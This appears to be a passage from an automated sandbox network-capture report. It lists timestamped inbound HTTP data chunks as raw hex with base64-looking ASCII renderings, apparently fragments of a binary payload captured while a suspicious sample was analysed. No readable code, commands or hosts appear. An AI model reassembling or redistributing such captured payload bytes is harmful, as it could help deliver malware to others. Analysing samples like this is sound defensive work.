44 72 42 38 Data Ascii: NmTz6TGgyV07cp13CCABmkFEuAxC5LgMQendwURAdVF6ObQMQOjADEJEwAxDzMAMQbVlxRms2UElQRQcHBwcHBw0HBwcIBwcHal92Rm81UElQRQcHBwcHBw0HBwcIBwcHal90Rm81UElQRQcHBwcHBw0HBwcIBwcHal90Rm81UElQRQcHBszMzMbMzMzDzMzMONOfwoQq3gOnwewI3UUI3RYk6NknAQCDqVDrxKhNXokStgEAAADrB8
2022-01-30 12:30:36 UTC	440	IN	Data Raw: 6f 6c 4e 31 49 74 56 31 46 69 4e 6a 59 54 30 2f 2f 2f 6f 61 65 43 50 76 75 57 33 30 37 57 6f 76 59 6d 46 6c 50 76 2f 2f 38 79 46 6d 50 76 77 2f 77 48 47 0d 0a 4b 4b 52 35 7a 4f 56 65 72 4c 47 6f 79 34 30 30 2f 2f 2f 2f 6a 5a 2b 63 2b 2f 2f 77 69 5a 55 34 6b 71 65 4d 79 75 30 47 71 4c 47 6f 79 59 30 34 2f 2f 2f 2f 69 59 38 73 2f 2f 2f 77 69 59 30 77 0d 0a 6b 71 65 4d 4b 32 70 59 56 73 58 43 63 76 2f 2f 2f 31 4b 4c 68 53 62 2f 2f 2f 39 66 6a 59 32 77 6c 4b 65 4d 71 59 6a 75 71 72 48 61 7a 37 44 35 2f 2f 2b 4a 6a 63 72 35 2f 2f 2f 4a 68 63 54 35 0d 0a 6b 71 64 79 68 79 33 4f 58 49 6b 53 6b 74 69 65 42 78 43 4c 56 64 70 53 6a 59 32 76 2b 2f 2f 2f 68 63 76 46 76 5a 65 2f 30 75 36 73 76 66 2b 4a 68 62 44 37 2f 2f 58 47 68 62 54 30 2f 2f 38 42 0d 0a 71 78 32 50 Data Ascii: olN1ItV1FiNjYT0///oaeCPvuW307WovYmFlPv//8yFmPvw/wHGKKR5zOVerLGoy400////jZ+c+//wiZU4kqeMyu0GqLGoyY04////iY8s///wiY0wkqeMK2pYVsXCcv///1KLhSb///9fjY2wlKeMqYjuqrHaz7D5//+Jjcr5///JhcT5kqdyhy3OXIkSktieBxCLVdpSjY2v+///hcvFvZe/0u6svf+JhbD7//XGhbT0//8Bqx2P
2022-01-30 12:30:36 UTC	456	IN	Data Raw: 76 2f 2f 35 74 31 6e 76 35 66 4e 33 4d 4e 50 76 50 2f 2f 69 59 55 4d 2f 76 58 2f 69 59 30 66 2f 76 2f 2f 0d 0a 42 31 6f 5a 51 4f 4f 6e 52 37 43 6f 76 56 4b 4c 68 51 7a 2b 2f 2f 56 51 6a 59 30 62 2b 76 2f 2f 68 63 76 64 76 4a 65 2f 32 6c 71 74 76 66 2b 4a 6a 53 54 36 2f 2f 58 47 68 53 6a 31 2f 2f 38 42 0d 0a 71 78 32 50 55 71 2b 33 57 37 47 6f 76 64 69 65 42 78 43 4c 6c 51 62 2f 2f 2f 39 64 6a 59 30 6f 6c 71 65 4d 71 53 69 36 71 37 48 61 78 79 6a 37 2f 2f 2b 4a 68 54 4c 37 2f 2f 2f 4a 68 54 7a 37 0d 0a 6b 71 64 79 68 79 33 4f 51 38 32 37 57 6f 76 4d 69 61 56 77 2f 50 58 2f 69 55 32 58 6a 56 56 4d 35 4d 31 37 76 70 66 4e 33 4d 74 66 76 66 2f 2f 69 59 56 73 2f 50 58 2f 6a 55 33 54 55 51 2b 32 0d 0a 4f 49 4d 68 79 69 57 71 76 78 76 47 76 76 2f 47 52 66 77 56 Data Ascii: v//5t1nv5fN3MNPvP//iYUM/vX/iY0f/v//B1oZQOOnR7CovVKLhQz+//VQjY0b+v//hcvdvJe/2lqtvf+JjST6//XGhSj1//8Bqx2PUq+3W7GovdieBxCLlQb///9djY0olqeMqSi6q7Haxyj7//+JhTL7///JhTz7kqdyhy3OQ827WovMiaVw/PX/iU2XjVVM5M17vpfN3Mtfvf//iYVs/PX/jU3TUQ+2OIMhyiWqvxvGvv/GRfwV
2022-01-30 12:30:36 UTC	472	IN	Data Raw: 55 32 38 55 59 32 56 56 50 62 2f 2f 31 4a 6c 41 47 67 4d 0d 0a 48 56 35 6a 71 53 41 4f 71 72 47 6f 6b 6d 6f 42 6a 59 30 34 2f 76 58 2f 36 4a 6d 66 2f 66 2f 47 4b 4b 52 33 63 71 69 36 45 71 54 61 44 2b 72 6f 32 44 4c 2b 2f 34 4e 46 75 49 74 43 75 4f 68 74 0d 0a 66 61 65 4d 79 69 57 4b 42 73 58 43 4f 76 2f 2f 2f 31 4b 4e 52 53 35 51 69 34 31 37 2f 2f 2f 2f 50 4e 58 6d 43 5a 62 4e 71 42 79 2f 69 57 62 38 2f 31 44 6f 52 57 7a 38 2f 31 44 6e 76 32 62 38 0d 0a 6b 67 69 62 2b 41 37 4f 71 48 32 58 79 6b 58 70 6a 55 33 70 36 42 59 6c 2f 76 2b 47 52 62 53 4c 49 4f 79 62 59 47 66 4e 71 4d 55 61 39 6c 47 4e 6c 56 54 38 2f 2f 56 53 6a 59 56 48 2f 76 2f 2f 0d 0a 50 62 44 35 4a 35 54 4e 42 36 62 54 4a 50 7a 2f 4d 38 6d 49 54 65 4b 4e 54 65 6a 6e 6c 2f 44 39 6b 74 45 32 Data Ascii: U28UY2VVPb//1JlAGgMHV5jqSAOqrGokmoBjY04/vX/6Jmf/f/GKKR3cqi6EqTaD+ro2DL+/4NFuItCuOhtfaeMyiWKBsXCOv///1KNRS5Qi417////PNXmCZbNqBy/iWb8/1DoRWz8/1Dnv2b8kgib+A7OqH2XykXpjU3p6BYl/v+GRbSLIOybYGfNqMUa9lGNlVT8//VSjYVH/v//PbD5J5TNB6bTJPz/M8mITeKNTejnl/D9ktE2
2022-01-30 12:30:36 UTC	488	IN	Data Raw: 67 59 51 0d 0a 68 53 32 62 51 57 69 78 6b 30 4c 63 46 2f 79 4c 41 6f 6f 49 69 45 66 34 67 48 33 33 41 41 2b 45 37 56 68 7a 51 65 68 50 72 30 38 6a 53 6f 42 39 2b 41 4a 30 50 4f 46 2b 69 31 58 7a 69 77 4b 4c 0d 0a 4a 56 44 36 44 4a 69 35 41 72 37 65 46 2b 79 4c 52 65 79 4a 52 65 4b 4c 54 65 69 45 45 59 73 43 35 42 32 58 79 69 58 57 33 67 4f 33 7a 31 58 67 69 56 58 63 69 30 2f 63 69 77 69 45 56 66 79 4a 0d 0a 4a 31 79 59 44 2b 4e 33 71 38 56 66 79 56 45 49 69 56 58 59 69 30 2f 59 69 55 58 37 69 30 33 30 35 42 57 37 79 6a 33 47 33 45 7a 65 42 39 53 4c 54 64 53 4a 54 64 71 4e 56 64 43 47 56 63 79 4c 0d 0a 4b 4a 54 34 53 65 4e 6e 71 38 63 64 53 75 73 57 69 30 58 38 78 30 6f 4d 41 51 41 50 41 4f 73 4b 35 68 57 50 68 69 6b 2b 56 30 35 58 51 6f 76 6c 58 63 50 4d Data Ascii: gYQhS2bQWixk0LcF/yLAooIiEf4gH33AA+E7VhzQehPr08jSoB9+AJ0POF+i1XziwKLJVD6DJi5Ar7eF+yLReyJReKLTeiEEYsC5B2XyiXW3gO3z1XgiVXci0/ciwiEVfyJJ1yYD+N3q8VfyVEIiVXYi0/YiUX7i0305BW7yj3G3EzeB9SLTdSJTdqNVdCGVcyLKJT4SeNnq8cdSusWi0X8x0oMAQAPAOsK5hWPhik+V05XQovlXcPM
2022-01-30 12:30:36 UTC	504	IN	Data Raw: 58 30 77 59 51 38 67 39 59 77 63 6e 4d 7a 4d 7a 44 7a 4d 7a 4d 6f 5a 53 2f 6a 61 54 2b 6d 34 4c 55 66 35 79 74 42 78 41 47 66 42 76 46 2b 57 37 4f 78 4f 4e 35 0d 0a 54 35 70 79 49 35 6e 4d 58 36 69 58 67 51 39 58 79 66 49 50 4b 73 41 50 56 38 44 39 44 79 72 42 72 4c 46 73 73 32 64 72 57 6b 37 47 52 42 44 79 44 31 67 45 7a 66 4b 51 42 68 44 39 44 31 6a 42 0d 0a 72 67 33 34 72 5a 35 33 58 30 38 42 79 66 48 48 42 67 79 52 42 68 70 30 43 6d 6f 44 56 75 68 72 6c 36 65 4d 47 44 47 35 6b 52 41 4b 67 41 51 41 56 59 76 73 69 30 38 4d 67 2b 67 50 64 44 4f 44 0d 0a 68 56 6b 48 59 65 76 61 56 6a 70 47 77 65 67 42 64 41 55 7a 77 45 72 72 4d 4f 67 6e 2b 2f 2f 2f 68 6c 32 62 51 35 50 4e 71 45 48 68 67 75 73 66 2f 33 55 51 2f 33 38 49 36 42 67 50 41 41 42 5a 0d 0a 68 6b Data Ascii: X0wYQ8g9YwcnMzMzDzMzMoZS/jaT+m4LUf5ytBxAGfBvF+W7OxON5T5pyI5nMX6iXgQ9XyfIPKsAPV8D9DyrBrLFss2drWk7GRBDyD1gEzfKQBhD9D1jBrg34rZ53X08ByfHHBgyRBhp0CmoDVuhrl6eMGDG5kRAKgAQAVYvsi08Mg+gPdDODhVkHYevaVjpGwegBdAUzwErrMOgn+///hl2bQ5PNqEHhgusf/3UQ/38I6BgPAABZhk
2022-01-30 12:30:36 UTC	520	IN	Data Raw: 4b 77 48 55 43 35 70 2b 4d 4e 47 42 69 76 2b 4f 32 76 66 2b 4c 64 53 54 2f 4e 76 56 31 47 50 39 36 46 46 66 6f 0d 0a 44 31 46 7a 51 65 4e 30 55 77 34 48 76 58 55 59 56 2b 69 7a 44 77 6f 41 61 41 41 4f 41 41 44 2f 47 48 43 4d 4d 6d 54 4e 49 6c 61 6f 4e 78 42 58 2f 33 55 49 36 4e 38 47 41 41 43 4d 78 44 69 46 0d 0a 72 53 78 30 46 6a 6a 61 59 61 2b 6f 76 56 39 65 57 31 33 44 56 59 48 73 67 2b 78 72 55 31 5a 58 35 69 56 72 63 71 68 6c 71 44 74 44 79 30 58 77 2f 33 55 4d 69 45 2f 6f 36 45 6b 41 41 41 43 4c 0d 0a 70 64 75 33 54 65 46 2f 72 38 32 75 76 51 2b 4d 63 77 4d 41 41 44 46 50 42 41 2b 43 61 67 4d 41 62 64 4d 75 53 65 6b 4a 4e 44 30 36 6f 67 2b 46 39 77 41 41 41 49 6c 37 45 41 4d 41 68 65 30 41 0d 0a 62 56 6a 79 4f 6e 77 53 55 74 31 4f 4e 68 61 42 65 78 Data Ascii: KwHUC5p+MNGBiv+O2vf+LdST/NvV1GP96FFfoD1FzQeN0Uw4HvXUYV+izDwoAaAAOAAD/GHCMMmTNIlaoNxBX/3UI6N8GAACMxDiFrSx0FjjaYa+ovV9eW13DVYHsg+xrU1ZX5iVrcqhlqDtDy0Xw/3UMiE/o6EkAAACLpdu3TeF/r82uvQ+McwMAADFPBA+CagMAbdMuSekJND06og+F9wAAAIl7EAMAhe0AbVjyOnwSUt1ONhaBex
2022-01-30 12:30:36 UTC	536	IN	Data Raw: 6f 76 51 2b 46 61 66 7a 2f 2f 34 47 4e 31 50 62 77 2f 34 58 4a 0d 0a 47 52 33 34 66 65 55 32 38 45 68 48 78 2f 38 50 68 59 67 41 41 41 6f 7a 77 46 43 47 68 64 54 30 6b 71 66 36 78 45 54 4d 71 4c 48 61 78 39 6a 30 2f 2f 39 51 6a 59 38 77 2f 76 2f 77 61 4d 77 42 0d 0a 62 56 67 6a 71 58 63 71 56 30 37 55 68 68 43 4c 6e 53 7a 2b 2f 2f 57 4a 6e 65 6a 35 2f 2f 2b 46 74 6c 66 32 72 57 67 79 56 33 32 65 71 77 55 42 41 41 41 7a 77 46 71 4a 68 64 54 37 2f 2f 2b 4a 0d 0a 36 48 53 4e 76 70 65 2f 30 70 61 6a 76 66 39 51 6a 59 55 77 2f 76 58 2f 61 4d 77 4f 41 41 42 51 68 59 4a 6b 51 57 69 78 6b 31 35 6c 67 75 6c 46 2f 2f 2f 2f 67 36 2f 55 39 50 2f 77 41 49 4f 6c 0d 0a 51 61 61 4d 76 6d 68 59 56 36 55 7a 77 66 38 42 64 4b 6d 46 32 33 36 74 4d 38 6b 38 39 6f 76 48 6d 76 Data Ascii: ovQ+Fafz//4GN1Pbw/4XJGR34feU28EhHx/8PhYgAAAozwFCGhdT0kqf6xETMqLHax9j0//9QjY8w/v/waMwBbVgjqXcqV07UhhCLnSz+//WJnej5//+Ftlf2rWgyV32eqwUBAAAzwFqJhdT7//+J6HSNvpe/0pajvf9QjYUw/vX/aMwOAABQhYJkQWixk15lgulF////g6/U9P/wAIOlQaaMvmhYV6Uzwf8BdKmF236tM8k89ovHmv
2022-01-30 12:30:36 UTC	552	IN	Data Raw: 77 67 2f 6a 2f 0d 0a 47 56 34 31 65 68 30 69 4b 35 49 49 47 56 35 64 77 34 76 2f 56 59 48 73 56 6a 50 35 4f 58 55 51 45 30 51 6b 79 68 55 6d 33 41 4e 66 46 66 39 31 44 4f 68 38 49 41 6f 41 67 7a 2f 77 64 41 5a 47 0d 0a 56 69 31 6a 50 59 46 74 43 52 4f 55 79 66 39 56 69 2b 78 57 4d 2f 77 35 64 52 42 78 49 56 4e 6d 59 75 59 75 54 54 2b 35 4b 6c 72 63 44 77 68 58 55 2b 69 4f 49 41 6f 41 67 7a 2f 77 64 41 5a 47 0d 0a 56 69 31 6a 50 59 4e 74 44 42 41 4b 67 59 76 2f 56 59 76 73 55 54 6e 41 69 55 33 7a 69 51 47 4a 4c 46 7a 36 41 47 43 37 46 6b 4c 65 41 78 43 4a 51 52 53 4a 51 52 4b 4a 51 52 79 47 51 53 43 4a 0d 0a 4c 48 7a 36 41 45 42 55 33 67 39 6e 79 30 45 34 69 45 45 38 69 59 74 41 42 41 41 50 69 59 46 45 61 56 68 7a 79 71 6e 37 6c 4d 57 6f 46 34 76 73 55 54 Data Ascii: wg/j/GV41eh0iK5IIGV5dw4v/VYHsVjP5OXUQE0QkyhUm3ANfFf91DOh8IAoAgz/wdAZGVi1jPYFtCROUyf9Vi+xWM/w5dRBxIVNmYuYuTT+5KlrcDwhXU+iOIAoAgz/wdAZGVi1jPYNtDBAKgYv/VYvsUTnAiU3ziQGJLFz6AGC7FkLeAxCJQRSJQRKJQRyGQSCJLHz6AEBU3g9ny0E4iEE8iYtABAAPiYFEaVhzyqn7lMWoF4vsUT
2022-01-30 12:30:36 UTC	568	IN	Data Raw: 44 74 62 76 58 55 49 36 41 54 2b 2f 2f 58 4d 69 2f 39 61 69 2b 79 4e 4b 45 67 6a 4b 32 6a 4e 49 6b 4b 6f 4e 77 6a 6f 54 76 2f 2f 2f 34 6e 45 45 46 33 4d 69 2f 39 56 0d 0a 35 72 54 2b 42 48 78 69 50 55 36 6f 4e 78 44 2f 64 51 7a 2f 64 51 4c 6f 56 66 2f 77 2f 34 50 45 65 51 57 77 79 70 64 6b 41 50 48 66 38 77 63 51 4d 2f 5a 71 41 47 4b 67 44 77 41 50 56 2b 6a 4b 0d 0a 43 56 68 7a 78 4b 68 47 54 37 46 53 6d 72 49 48 45 49 50 47 47 49 6e 48 47 49 48 78 55 41 45 41 62 53 71 6f 38 57 6e 5a 58 53 52 58 71 68 30 41 41 41 42 5a 4d 73 70 66 58 73 4f 45 2f 31 57 4c 0d 0a 67 54 4d 32 53 58 41 33 33 2f 39 51 55 6c 44 2f 46 52 42 67 42 68 70 64 77 34 76 77 56 6f 73 31 74 65 70 30 55 65 33 45 49 32 34 38 68 42 68 58 6a 62 68 77 73 51 30 51 56 2f 38 61 48 47 41 47 0d 0a Data Ascii: DtbvXUI6AT+//XMi/9ai+yNKEgjK2jNIkKoNwjoTv///4nEEF3Mi/9V5rT+BHxiPU6oNxD/dQz/dQLoVf/w/4PEeQWwypdkAPHf8wcQM/ZqAGKgDwAPV+jKCVhzxKhGT7FSmrIHEIPGGInHGIHxUAEAbSqo8WnZXSRXqh0AAABZMspfXsOE/1WLgTM2SXA33/9QUlD/FRBgBhpdw4vwVos1tep0Ue3EI248hBhXjbhwsQ0QV/8aHGAG
2022-01-30 12:30:36 UTC	584	IN	Data Raw: 51 34 41 74 38 65 70 6e 53 64 7a 51 52 31 49 33 41 4e 62 79 56 55 49 39 38 48 2f 2f 77 55 41 64 51 53 4b 30 6e 52 6f 0d 0a 73 34 48 4e 51 70 54 4e 71 4a 47 33 45 54 50 62 39 73 52 42 64 51 74 44 39 6b 55 42 45 48 55 66 62 70 48 36 44 47 53 33 68 54 64 52 77 63 6b 42 69 55 30 4d 41 39 68 4f 39 6b 55 42 45 48 54 6f 0d 0a 43 39 4d 4f 54 2b 46 6e 58 2f 61 34 76 51 41 41 5a 69 50 34 68 64 45 50 74 38 64 70 69 58 30 4f 4e 69 78 36 54 47 69 79 56 30 34 78 79 30 55 4f 33 55 55 49 61 67 70 52 55 64 30 54 4a 4f 67 78 0d 0a 62 56 68 7a 77 71 77 2b 76 47 30 39 51 6c 48 64 32 46 48 64 48 43 37 6f 48 67 41 50 41 41 2b 33 6d 74 75 33 54 61 6e 63 55 38 2b 78 76 51 63 41 41 49 48 75 2f 67 6b 41 41 46 2b 45 52 52 43 4a 0d 0a 58 51 59 75 67 75 50 4e 41 73 57 37 45 31 47 4c Data Ascii: Q4At8epnSdzQR1I3ANbyVUI98H//wUAdQSK0nRos4HNQpTNqJG3ETPb9sRBdQtD9kUBEHUfbpH6DGS3hTdRwckBiU0MA9hO9kUBEHToC9MOT+FnX/a4vQAAZiP4hdEPt8dpiX0ONix6TGiyV04xy0UO3UUIagpRUd0TJOgxbVhzwqw+vG09QlHd2FHdHC7oHgAPAA+3mtu3TancU8+xvQcAAIHu/gkAAF+ERRCJXQYuguPNAsW7E1GL
2022-01-30 12:30:36 UTC	600	IN	Data Raw: 44 70 62 77 58 34 59 2f 6e 51 47 67 45 51 6f 67 4f 74 32 69 38 66 47 0d 0a 4b 33 44 79 77 6f 41 79 49 31 37 55 71 67 46 30 42 34 50 6f 41 57 44 30 36 77 5a 6c 39 65 73 43 42 36 34 72 45 5a 63 6e 39 79 35 52 55 6f 76 59 67 2f 76 2f 64 41 65 46 32 33 51 47 55 2f 38 56 0d 0a 79 54 68 31 55 59 4d 77 5a 49 37 53 67 6e 51 63 44 37 62 41 69 56 51 59 67 2f 67 4e 64 51 61 41 49 33 41 7a 71 6b 47 78 72 30 30 69 5a 6f 42 4f 4b 41 6a 72 48 6f 70 4f 4b 45 44 49 52 68 6a 2b 0d 0a 6b 71 65 4d 34 46 79 47 55 46 37 53 67 6e 51 4b 69 77 53 34 78 30 6f 51 2f 76 2f 77 2f 30 65 44 6b 6c 74 38 78 44 2f 4e 71 4c 45 49 48 46 76 44 61 67 78 6f 2b 48 51 48 45 4f 67 50 37 66 37 2f 0d 0a 42 31 2b 62 68 4d 72 4e 71 42 64 6b 6d 59 68 64 35 34 6c 64 2f 46 6e 6f 4f 4a 51 50 41 46 6d 46 Data Ascii: DpbwX4Y/nQGgEQogOt2i8fGK3DywoAyI17UqgF0B4PoAWD06wZl9esCB64rEZcn9y5RUovYg/v/dAeF23QGU/8VyTh1UYMwZI7SgnQcD7bAiVQYg/gNdQaAI3AzqkGxr00iZoBOKAjrHopOKEDIRhj+kqeM4FyGUF7SgnQKiwS4x0oQ/v/w/0eDklt8xD/NqLEIHFvDagxo+HQHEOgP7f7/B1+bhMrNqBdkmYhd54ld/FnoOJQPAFmF
2022-01-30 12:30:36 UTC	616	IN	Data Raw: 51 63 66 5a 67 38 6f 0d 0a 57 4f 69 2f 52 33 68 55 57 42 65 59 4a 41 39 59 30 57 59 50 63 4d 44 75 38 67 39 57 31 2f 49 50 4e 59 6d 42 54 6a 44 6d 4d 55 46 46 5a 39 44 4d 42 68 42 6d 44 32 54 4b 67 65 71 50 2f 77 45 41 0d 0a 6d 6f 4b 79 75 32 2b 78 6c 55 7a 63 67 49 50 67 49 41 50 51 5a 67 56 58 2f 37 69 50 50 77 41 41 43 31 65 33 75 57 76 41 57 42 63 44 5a 68 54 79 44 31 6e 48 5a 67 56 7a 38 53 31 70 44 33 44 4a 0d 0a 4b 54 35 38 61 56 58 79 6d 30 68 48 73 41 39 59 36 6d 59 50 57 64 50 79 44 31 6a 4b 5a 67 38 55 72 54 35 38 47 4a 6a 41 57 42 65 33 4a 41 39 5a 77 47 59 50 57 50 52 6d 44 31 6e 33 38 67 39 5a 0d 0a 72 6a 35 38 4d 5a 2f 63 70 55 45 4f 68 57 59 50 63 4f 76 75 38 67 56 5a 38 2f 49 41 57 65 4e 6d 59 6a 61 4b 4a 32 64 42 6f 47 4d 78 54 57 37 53 Data Ascii: QcfZg8oWOi/R3hUWBeYJA9Y0WYPcMDu8g9W1/IPNYmBTjDmMUFFZ9DMBhBmD2TKgeqP/wEAmoKyu2+xlUzcgIPgIAPQZgVX/7iPPwAAC1e3uWvAWBcDZhTyD1nHZgVz8S1pD3DJKT58aVXym0hHsA9Y6mYPWdPyD1jKZg8UrT58GJjAWBe3JA9ZwGYPWPRmD1n38g9Zrj58MZ/cpUEOhWYPcOvu8gVZ8/IAWeNmYjaKJ2dBoGMxTW7S
2022-01-30 12:30:36 UTC	632	IN	Data Raw: 2b 56 30 35 58 77 53 63 41 6a 55 58 73 69 37 53 77 41 41 41 50 61 67 35 58 42 31 6b 6a 71 63 50 77 71 4c 48 61 43 51 53 4c 38 46 46 71 44 31 32 4e 52 65 78 6c 41 56 44 6f 0d 0a 2b 70 71 4d 76 6d 50 43 32 67 31 66 45 6d 6f 51 56 34 31 46 37 47 41 42 55 4f 69 4d 77 76 2f 2f 5a 71 6a 2b 41 6c 68 69 50 55 41 41 7a 30 58 73 61 67 4a 51 36 47 58 43 2f 2f 2b 4d 78 46 41 4c 0d 0a 6e 64 55 77 64 54 68 59 57 42 6e 61 42 2b 78 71 41 6c 44 6f 57 4d 6a 2f 2f 34 50 4c 46 41 76 47 47 58 49 67 71 51 72 4d 71 4c 45 45 71 70 70 32 2f 2f 2f 2f 64 66 4c 6f 6b 6e 62 77 2f 34 50 45 0d 0a 59 64 73 2b 74 5a 65 35 47 72 49 47 71 6f 4a 32 2f 2f 2b 4c 52 66 35 5a 36 33 43 45 55 77 6a 72 5a 74 55 37 6b 65 6a 4c 58 6a 6b 2f 79 67 70 43 69 67 4b 45 77 48 2f 76 69 33 33 33 69 33 55 49 Data Ascii: +V05XwScAjUXsi7SwAAAPag5XB1kjqcPwqLHaCQSL8FFqD12NRexlAVDo+pqMvmPC2g1fEmoQV41F7GABUOiMwv//Zqj+AlhiPUAAz0XsagJQ6GXC//+MxFALndUwdThYWBnaB+xqAlDoWMj//4PLFAvGGXIgqQrMqLEEqpp2////dfLoknbw/4PEYds+tZe5GrIGqoJ2//+LRf5Z63CEUwjrZtU7kejLXjk/ygpCigKEwH/vi333i3UI
2022-01-30 12:30:36 UTC	648	IN	Data Raw: 46 79 58 52 31 67 36 57 30 6c 61 65 4d 51 56 76 4e 33 4d 72 71 63 76 37 2f 2f 32 6f 4b 57 76 33 69 41 34 57 37 2b 50 2f 2f 0d 0a 35 4e 7a 4f 63 5a 62 4e 71 4d 32 46 51 6b 65 4a 6c 62 54 34 2f 2f 55 37 2b 58 58 57 69 37 32 34 6c 61 65 4d 78 4c 70 47 46 38 58 53 62 76 37 2f 2f 34 50 34 63 33 6b 50 69 5a 53 4b 4d 50 37 2f 0d 0a 6b 71 66 32 62 5a 62 4e 71 4b 56 78 63 63 42 51 69 59 57 63 39 76 58 2f 69 59 55 6a 2f 76 2f 2f 34 4e 33 54 74 35 66 4e 42 38 50 53 63 76 37 2f 2f 31 5a 51 36 42 48 53 2f 76 2b 4d 78 42 43 4e 0d 0a 36 41 53 50 76 70 64 69 32 73 74 37 76 50 2f 2f 55 4f 68 75 7a 50 54 2f 57 56 6d 45 6a 5a 7a 34 6b 71 63 5a 53 7a 49 4a 6c 55 48 53 42 41 45 41 41 49 75 46 58 50 62 2f 2f 34 31 32 41 66 2b 46 0d 0a 2b 61 43 4d 76 71 34 7a 5a 73 66 71 2b 76 Data Ascii: FyXR1g6W0laeMQVvN3Mrqcv7//2oKWv3iA4W7+P//5NzOcZbNqM2FQkeJlbT4//U7+XXWi724laeMxLpGF8XSbv7//4P4c3kPiZSKMP7/kqf2bZbNqKVxccBQiYWc9vX/iYUj/v//4N3Tt5fNB8PScv7//1ZQ6BHS/v+MxBCN6ASPvpdi2st7vP//UOhuzPT/WVmEjZz4kqcZSzIJlUHSBAEAAIuFXPb//412Af+F+aCMvq4zZsfq+v
2022-01-30 12:30:36 UTC	664	IN	Data Raw: 79 2f 33 45 6a 61 77 2b 33 30 43 50 57 77 65 67 45 71 41 52 37 41 34 50 4b 0d 0a 5a 66 42 37 4e 57 75 78 6e 55 72 2f 55 6e 51 44 67 38 6f 43 71 43 70 30 41 67 76 5a 71 41 4a 30 62 31 4f 6b 54 73 5a 76 72 38 55 53 75 6f 50 67 77 49 6c 46 39 41 57 75 56 66 53 45 52 66 69 6f 0d 0a 55 69 78 62 79 71 41 52 6d 59 2b 32 52 71 67 45 64 41 4f 44 79 51 4b 6f 43 48 51 4d 67 38 6b 45 78 55 67 48 51 75 76 37 56 65 5a 33 4e 67 49 4c 7a 71 67 43 64 41 67 4c 7a 77 76 46 69 38 46 66 0d 0a 68 6d 51 56 79 69 58 4f 5a 49 36 68 67 7a 39 30 4d 51 2b 33 77 53 6e 47 77 65 41 4c 39 73 45 45 47 56 76 77 69 57 44 45 6c 6b 59 6a 51 59 50 49 42 50 62 42 45 48 34 44 67 38 67 4e 39 73 45 67 0d 0a 47 56 70 34 68 35 37 7a 56 54 70 53 54 77 41 41 43 41 42 65 79 63 6d 4c 2f 31 57 45 37 49 Data Ascii: y/3Ejaw+30CPWwegEqAR7A4PKZfB7NWuxnUr/UnQDg8oCqCp0AgvZqAJ0b1OkTsZvr8USuoPgwIlF9AWuVfSERfioUixbyqARmY+2RqgEdAODyQKoCHQMg8kExUgHQuv7VeZ3NgILzqgCdAgLzwvFi8FfhmQVyiXOZI6hgz90MQ+3wSnGweAL9sEEGVvwiWDElkYjQYPIBPbBEH4Dg8gN9sEgGVp4h57zVTpSTwAACABeycmL/1WE7I
2022-01-30 12:30:36 UTC	680	IN	Data Raw: 4c 54 62 7a 6d 76 30 2f 37 0d 0a 6b 74 50 2b 6f 5a 62 4e 71 4b 65 54 46 76 76 2f 69 30 32 34 36 61 5a 50 2b 2f 2b 43 6a 52 54 2f 6b 71 65 61 38 44 7a 4a 71 4d 58 61 68 76 37 2f 2f 2b 6d 6d 56 50 48 2f 69 30 32 37 36 59 35 50 0d 0a 6c 71 66 34 7a 4e 54 4d 71 4c 47 2b 30 56 54 37 2f 34 32 4e 48 50 54 2f 2f 2b 6d 48 56 50 76 2f 35 74 58 62 76 35 66 4e 76 6a 4d 44 75 66 2b 4c 6a 61 44 2b 2f 2f 58 70 63 6c 54 30 2f 34 32 4e 0d 0a 61 61 61 4d 76 6f 46 56 41 37 57 6f 79 59 32 51 2f 76 2f 2f 36 56 5a 55 2b 2f 2b 45 6a 59 6a 2b 6b 71 65 61 45 44 7a 4a 71 4d 50 61 72 76 33 2f 2f 2b 6c 47 56 50 48 2f 69 34 31 33 2f 76 2f 2f 0d 0a 68 47 4d 6e 75 70 65 35 32 69 61 70 76 66 2f 70 4d 46 54 37 2f 34 47 4e 57 50 37 77 2f 2b 6b 6c 4f 61 4f 4d 79 75 56 36 71 62 47 6f 71 78 Data Ascii: LTbzmv0/7ktP+oZbNqKeTFvv/i0246aZP+/+CjRT/kqea8DzJqMXahv7//+mmVPH/i0276Y5Plqf4zNTMqLG+0VT7/42NHPT//+mHVPv/5tXbv5fNvjMDuf+LjaD+//XpclT0/42NaaaMvoFVA7WoyY2Q/v//6VZU+/+EjYj+kqeaEDzJqMParv3//+lGVPH/i413/v//hGMnupe52iapvf/pMFT7/4GNWP7w/+klOaOMyuV6qbGoqx
2022-01-30 12:30:36 UTC	696	IN	Data Raw: 4f 4e 6e 71 78 7a 63 42 2f 68 51 36 48 2f 50 2f 66 58 47 67 45 53 6c 42 78 41 41 68 70 37 34 70 44 58 78 6d 34 49 43 79 65 79 44 37 41 67 50 56 38 70 6d 44 78 4e 4b 2b 4f 73 53 0d 0a 35 68 32 4c 77 71 67 7a 33 41 4f 72 77 64 45 41 69 55 58 34 69 55 66 38 67 33 33 7a 41 48 63 69 48 31 37 77 50 4a 41 76 4a 46 51 39 51 6d 6f 42 69 31 58 38 55 6f 46 46 2b 46 44 6e 4c 38 2f 39 0d 0a 6b 70 37 7a 6c 63 67 31 52 30 36 38 68 49 76 6c 58 63 50 4d 7a 46 2b 4c 37 49 50 6a 43 41 39 58 72 54 35 38 55 69 33 4b 76 46 7a 63 42 2f 69 44 77 41 47 4c 54 66 61 44 30 51 43 47 52 66 69 4a 0d 0a 49 4b 54 77 50 4a 51 79 49 47 77 6c 52 49 4e 39 2b 41 52 7a 47 6d 41 41 61 67 47 45 56 66 78 53 35 68 32 4c 45 59 44 74 6d 62 4f 6f 68 49 42 77 6f 67 63 51 41 4f 48 47 69 2b 56 53 77 38 Data Ascii: ONnqxzcB/hQ6H/P/fXGgESlBxAAhp74pDXxm4ICyeyD7AgPV8pmDxNK+OsS5h2Lwqgz3AOrwdEAiUX4iUf8g33zAHciH17wPJAvJFQ9QmoBi1X8UoFF+FDnL8/9kp7zlcg1R068hIvlXcPMzF+L7IPjCA9XrT58Ui3KvFzcB/iDwAGLTfaD0QCGRfiJIKTwPJQyIGwlRIN9+ARzGmAAagGEVfxS5h2LEYDtmbOohIBwogcQAOHGi+VSw8
